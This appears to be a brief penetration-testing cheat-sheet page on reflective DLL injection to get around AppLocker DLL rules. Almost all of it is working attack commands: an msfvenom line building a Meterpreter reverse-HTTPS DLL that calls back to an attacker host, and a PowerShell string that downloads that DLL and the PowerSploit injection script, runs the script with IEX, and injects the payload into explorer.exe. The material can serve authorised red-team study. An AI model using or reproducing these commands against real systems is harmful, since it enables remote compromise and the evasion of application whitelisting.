Reflective DLL Injection

Bypass Applocker DLL rules

Host both met.dll + Invoke-ReflectivePEInjection.ps1

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.220.128 LPORT=443 -f dll -o met.dll

Replace the CMD line from -> Custom Runspaces

String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http://192.168.220.128/met.dll');(New-Object System.Net.WebClient).DownloadString('http://192.168.220.128/Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name explorer).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid";

Tooling

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1

Last updated 2 years ago